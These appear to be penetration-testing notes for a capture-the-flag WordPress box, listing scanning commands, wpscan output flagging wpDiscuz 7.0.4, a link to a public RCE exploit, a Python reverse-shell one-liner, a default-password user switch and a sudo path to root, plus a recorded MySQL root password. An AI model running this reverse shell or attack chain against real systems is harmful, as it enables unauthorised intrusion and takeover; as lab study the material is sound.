### OS: 

### Web-Technology: 

### IP: `192.168.240.217`

### USERS: 

### CREDENTIALS (WEB): 

### CREDENTIALS (SYSTEM-LEVEL): 
* MySQL: `root:sup3r_s3cr3t`
* Wordpress: `j@m3s:`

### PROOF: 

---
**Quick Scan:**

`nmap -vv -Pn -sV -sC -oA 192.168.240.217"_quick" 192.168.240.217 --open`

**Full Scan:**

`nmap -vv -p- -Pn -sV -sC -oA 192.168.240.217"_full" 192.168.240.217 --open`

**Directory Bruteforce:**

`feroxbuster -u http://192.168.240.217/ -t 10 -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt`

`wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt --hc 404 "http://192.168.240.217/FUZZ"`

`wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 "http://192.168.240.217/FUZZ/"`

---
NMAP RESULTS: 

```
192.168.240.217_quick.nmap
```
---
ENUM:

1. `dirbuster.jpg`

2. `wpscan --plugins-detection aggressive --url http://blogger.thm/assets/fonts/blog/`
```
[+] wpdiscuz
 | Location: http://blogger.thm/assets/fonts/blog/wp-content/plugins/wpdiscuz/
 | Last Updated: 2023-08-12T18:40:00.000Z
 | Readme: http://blogger.thm/assets/fonts/blog/wp-content/plugins/wpdiscuz/readme.txt
 | [!] The version is out of date, the latest version is 7.6.3
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/plugins/wpdiscuz/, status: 200
 |
 | Version: 7.0.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/plugins/wpdiscuz/readme.txt
```
https://github.com/h3v0x/CVE-2020-24186-WordPress-wpDiscuz-7.0.4-RCE/blob/main/wpDiscuz_RemoteCodeExec.py

4. `export RHOST="ip_address";export RPORT=9001;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'`
5. `user proof`
```
/home/james/local.txt
```
6. `/home/vagrant` `/home/ubuntu` `/home/james`
7. Try to switch user
```
su - vagrant
password: vagrant
```
8. `sudo -l`
```
Matching Defaults entries for vagrant on ubuntu-xenial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:
    (ALL) NOPASSWD: ALL
```
9. `sudo su -`
10. `root proof`
```
/root/proof.txt
```
---
BETTER SHELL:
```
python -c 'import pty; pty.spawn("/bin/bash")'
    OR
python3 -c 'import pty; pty.spawn("/bin/bash")'
    OR
/usr/bin/script -qc /bin/bash /dev/null

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp ; export TERM=xterm-256color ;	alias ll='ls -lsaht --color=auto'
Ctrl + Z [Background Process]
stty raw -echo ; fg ; reset
stty columns 200 rows 200
```

---
STEPS:

1. 
2. 

---
Take Away Concepts:
